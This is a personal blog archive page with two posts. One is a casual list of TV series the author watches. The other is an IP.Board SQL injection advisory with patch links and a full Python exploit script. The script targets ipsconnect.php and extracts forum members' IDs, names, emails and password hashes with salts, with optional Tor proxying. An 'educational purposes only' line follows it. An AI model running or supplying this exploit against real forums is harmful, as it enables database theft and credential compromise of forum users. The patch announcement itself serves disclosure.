Monthly Archives: December 2014

How to wasting my time

All these shits are my favourites time every week, watching all this crap beside games, sleep, cats and works. I am watching all this series from Original DVD’s or my Android Tablet or Minix using TVMC or XBMC software.

These all TV Series that I watched or watching since 2008 when I arrived in Australia:

  • On Going: The Walking dead, Sons Of Anarchy, Game of Throne, Modern Family, The Big Bang Theory, Person of Interest, Onepiece, Legend of Korra (avatar), The Flash, The 100, Teen Wolf, Almost Human
  • Finished: Breaking Bad, Heroes, The last Avatar (Aang), Everybody Loves Raymond, Seinfeld, Monk, Desperate House Wives, Prison Break, Revolution
  • Thinking to Continue: Naruto Shippuden, How I met your Mother, American Horror Story, Agent of SHIELD, Vikings, The Last Ship, It’s Always Sunny in Philadelphia, Bleach
  • Failed to Watch: Z Nation, Pretty Little Liars, Two and a Half Man, Arrow, Castle, The Good Wife, Sex and the City, Orange Is the New Black, Sherlock, Friends, Bates Motel, Charmed

 

Legend: 

  • On going: Watching every weeks
  • Finished: I finished them all
  • Thinking to Continue: I started to watch few of their series, sometime 1-2 season or sometime 5 episodes or above (consider good series).
  • Failed to Watch: Those series are maybe I got annoyed, disturbed, bored by them or failed story, or maybe just as simple as I don’t fucking like it.

Are they really wasting my time or I just wan to enjoying my life with the TV Shows series story ? How do you wasting  your time ?

IPBoard SQL Injection

Baru-baru ini IP.Board mengalami vuln / hole security yang cukup besar pada tanggal 10 November 2014 lalu. Bagi para owner forum khusus nya IPB / Invision Powerboard 3.3.x dan 3.4.x silahkan patch langsung dengan men download file attachment dibawah ini

Versi 3.4.x : 3_4_x_patch_nov_14
Versi 3.3.x: 3_3_x_patch_nov_14

IP.Board versions 3.3.X 3.4.X and below suffer from a remote SQL injection vulnerability.

#!/usr/bin/env python
# Sunday, November 09, 2014 - secthrowaway@safe-mail.net
# IP.Board <= 3.4.7 SQLi (blind, error based);
# you can adapt to other types of blind injection if 'cache/sql_error_latest.cgi' is unreadable

url = 'http://target.tld/forum/'
ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"

import sys, re

# <socks> - http://sourceforge.net/projects/socksipy/
#import socks, socket
#socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050)
#socket.socket = socks.socksocket
# </socks>

import urllib2, urllib

def inject(sql):
try:
urllib2.urlopen(urllib2.Request('%sinterface/ipsconnect/ipsconnect.php' % url, data="act=login&idType=id&id[]=-1&id[]=%s" % urllib.quote('-1) and 1!="\'" and extractvalue(1,concat(0x3a,(%s)))#\'' % sql), headers={"User-agent": ua}))
except urllib2.HTTPError, e:
if e.code == 503:
data = urllib2.urlopen(urllib2.Request('%scache/sql_error_latest.cgi' % url, headers={"User-agent": ua})).read()
txt = re.search("XPATH syntax error: ':(.*)'", data, re.MULTILINE)
if txt is not None:
return txt.group(1)
sys.exit('Error [3], received unexpected data:\n%s' % data)
sys.exit('Error [1]')
sys.exit('Error [2]')

def get(name, table, num):
sqli = 'SELECT %s FROM %s LIMIT %d,1' % (name, table, num)
s = int(inject('LENGTH((%s))' % sqli))
if s < 31:
return inject(sqli)
else:
r = ''
for i in range(1, s+1, 31):
r += inject('SUBSTRING((%s), %i, %i)' % (sqli, i, 31))
return r

n = inject('SELECT COUNT(*) FROM members')
print '* Found %s users' % n
for j in range(int(n)):
print get('member_id', 'members', j)
print get('name', 'members', j)
print get('email', 'members', j)
print get('CONCAT(members_pass_hash, 0x3a, members_pass_salt)', 'members', j)
print '----------------'

Those IP.Board SQL Injection information for educational purposes only.